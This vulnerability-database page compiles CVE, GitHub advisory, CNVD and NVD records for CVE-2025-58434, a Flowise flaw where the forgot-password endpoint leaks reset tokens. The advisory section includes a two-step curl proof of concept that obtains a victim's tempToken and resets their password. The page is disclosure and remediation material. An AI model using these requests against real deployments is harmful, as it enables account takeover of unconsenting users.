cvelistv5 - cve-2025-58434

CVE-2025-58434 (GCVE-0-2025-58434)

Vulnerability from cvelistv5 – Published: 2025-09-12 17:37 – Updated: 2025-09-15 15:31

Summary

Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-306 - Missing Authentication for Critical Function

Assigner

GitHub_M

References

URL

Tags

	https://github.com/FlowiseAI/Flowise/security/adv…	x_refsource_CONFIRM
	https://github.com/FlowiseAI/Flowise/commit/9e178…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	FlowiseAI	Flowise	Affected: <= 3.0.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-58434",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-12T18:10:37.792799Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-12T18:11:08.352Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Flowise",
          "vendor": "FlowiseAI",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 3.0.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-306",
              "description": "CWE-306: Missing Authentication for Critical Function",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-15T15:31:08.595Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
        },
        {
          "name": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
        }
      ],
      "source": {
        "advisory": "GHSA-wgpv-6j63-x5ph",
        "discovery": "UNKNOWN"
      },
      "title": "Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-58434",
    "datePublished": "2025-09-12T17:37:08.190Z",
    "dateReserved": "2025-09-01T20:03:06.531Z",
    "dateUpdated": "2025-09-15T15:31:08.595Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-58434\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-09-12T18:15:34.847\",\"lastModified\":\"2025-09-20T02:54:59.667\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-306\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.0.6\",\"matchCriteriaId\":\"5DE0B76C-5FFA-40E2-87E1-5C520E387AF0\"}]}]}],\"references\":[{\"url\":\"https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-58434\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-12T18:10:37.792799Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-12T18:10:45.115Z\"}}], \"cna\": {\"title\": \"Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover\", \"source\": {\"advisory\": \"GHSA-wgpv-6j63-x5ph\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"FlowiseAI\", \"product\": \"Flowise\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 3.0.5\"}]}], \"references\": [{\"url\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph\", \"name\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863\", \"name\": \"https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-306\", \"description\": \"CWE-306: Missing Authentication for Critical Function\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-09-15T15:31:08.595Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-58434\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-15T15:31:08.595Z\", \"dateReserved\": \"2025-09-01T20:03:06.531Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-09-12T17:37:08.190Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-WGPV-6J63-X5PH

Vulnerability from github – Published: 2025-09-12 20:02 – Updated: 2025-09-15 15:31

Summary

Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover

Details

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

The endpoint /api/v1/account/forgot-password accepts an email address as input.
Instead of only sending a reset email, the API responds directly with sensitive user details, including:
User ID, name, email, hashed credential, status, timestamps.
A valid tempToken and its expiry, which is intended for password reset.
This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.
Exploitation requires only the victim’s email address, which is often guessable or discoverable.
Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

Request a reset token for the victim

curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

Use the exposed tempToken to reset the password

curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
        "user":{
          "email":"<victim@example.com>",
          "tempToken":"<redacted-tempToken>",
          "password":"NewSecurePassword123!"
        }
      }'

Expected Result: 200 OK The victim’s account password is reset, allowing full login.

Impact

Type: Authentication bypass / Insecure direct object exposure.
Impact:
Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
Applies to both Flowise Cloud and locally hosted/self-managed deployments.
Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
Apply the same fixes to both cloud and self-hosted/local deployments.
Log and monitor password reset requests for suspicious activity.
Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58434"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-12T20:02:40Z",
    "nvd_published_at": "2025-09-12T18:15:34Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.\n\nThis vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.\n\n**CVSS v3.1 Base Score:** **9.8 (Critical)**\n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n---\n\n### Details\n\n* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.\n* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:\n\n  * User ID, name, email, hashed credential, status, timestamps.\n  * **A valid `tempToken` and its expiry**, which is intended for password reset.\n* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.\n* Exploitation requires only the victim\u2019s email address, which is often guessable or discoverable.\n* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.\n\nThis effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.\n\n---\n\n### PoC\n\n1. **Request a reset token for the victim**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/forgot-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"user\":{\"email\":\"\u003cvictim@example.com\u003e\"}}\u0027\n```\n\n**Response (201 Created):**\n\n```json\n{\n  \"user\": {\n    \"id\": \"\u003credacted-uuid\u003e\",\n    \"name\": \"\u003credacted\u003e\",\n    \"email\": \"\u003cvictim@example.com\u003e\",\n    \"credential\": \"\u003credacted-hash\u003e\",\n    \"tempToken\": \"\u003credacted-tempToken\u003e\",\n    \"tokenExpiry\": \"2025-08-19T13:00:33.834Z\",\n    \"status\": \"active\"\n  }\n}\n```\n\n2. **Use the exposed `tempToken` to reset the password**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/reset-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n        \"user\":{\n          \"email\":\"\u003cvictim@example.com\u003e\",\n          \"tempToken\":\"\u003credacted-tempToken\u003e\",\n          \"password\":\"NewSecurePassword123!\"\n        }\n      }\u0027\n```\n\n**Expected Result:** `200 OK`\nThe victim\u2019s account password is reset, allowing full login.\n\n---\n\n### Impact\n\n* **Type:** Authentication bypass / Insecure direct object exposure.\n* **Impact:**\n\n  * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.\n  * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.\n  * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.\n  * High likelihood of exploitation since no prior access or user interaction is required.\n\n---\n\n### Recommended Remediation\n\n* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.\n* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.\n* Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).\n* Apply the same fixes to **both cloud and self-hosted/local deployments**.\n* Log and monitor password reset requests for suspicious activity.\n* Consider multi-factor verification for sensitive accounts.\n\n\nCredit\n\n---\n\n\u26a0\ufe0f This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.\n\n---",
  "id": "GHSA-wgpv-6j63-x5ph",
  "modified": "2025-09-15T15:31:14Z",
  "published": "2025-09-12T20:02:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover"
}

CNVD-2025-21415

Vulnerability from cnvd - Published: 2025-09-17

Title

Flowise访问控制错误漏洞

Description

Flowise是FlowiseAI开源的一个用于轻松构建LLM应用程序的工具。 Flowise 3.0.5及之前版本存在访问控制错误漏洞，该漏洞源于forgot-password端点未经验证返回密码重置令牌，攻击者可利用该漏洞导致账户接管。

Severity

高

Formal description

厂商尚未提供漏洞修复方案，请关注厂商主页更新： https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863

Reference

https://nvd.nist.gov/vuln/detail/CVE-2025-58434

Impacted products

Name
Flowise Flowise <=3.0.5

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2025-58434",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434"
    }
  },
  "description": "Flowise\u662fFlowiseAI\u5f00\u6e90\u7684\u4e00\u4e2a\u7528\u4e8e\u8f7b\u677e\u6784\u5efaLLM\u5e94\u7528\u7a0b\u5e8f\u7684\u5de5\u5177\u3002\n\nFlowise 3.0.5\u53ca\u4e4b\u524d\u7248\u672c\u5b58\u5728\u8bbf\u95ee\u63a7\u5236\u9519\u8bef\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8eforgot-password\u7aef\u70b9\u672a\u7ecf\u9a8c\u8bc1\u8fd4\u56de\u5bc6\u7801\u91cd\u7f6e\u4ee4\u724c\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5bfc\u81f4\u8d26\u6237\u63a5\u7ba1\u3002",
  "formalWay": "\u5382\u5546\u5c1a\u672a\u63d0\u4f9b\u6f0f\u6d1e\u4fee\u590d\u65b9\u6848\uff0c\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\u66f4\u65b0\uff1a\r\nhttps://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2025-21415",
  "openTime": "2025-09-17",
  "products": {
    "product": "Flowise Flowise \u003c=3.0.5"
  },
  "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434",
  "serverity": "\u9ad8",
  "submitTime": "2025-09-16",
  "title": "Flowise\u8bbf\u95ee\u63a7\u5236\u9519\u8bef\u6f0f\u6d1e"
}

FKIE_CVE-2025-58434

Vulnerability from fkie_nvd - Published: 2025-09-12 18:15 - Updated: 2025-09-20 02:54

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863	Patch
	security-advisories@github.com	https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	flowiseai	flowise	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5DE0B76C-5FFA-40E2-87E1-5C520E387AF0",
              "versionEndExcluding": "3.0.6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts."
    }
  ],
  "id": "CVE-2025-58434",
  "lastModified": "2025-09-20T02:54:59.667",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-09-12T18:15:34.847",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-306"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-58434 (GCVE-0-2025-58434)

GHSA-WGPV-6J63-X5PH

Summary

Details

PoC

Impact

Recommended Remediation

CNVD-2025-21415

FKIE_CVE-2025-58434

Tags

Sightings

Nomenclature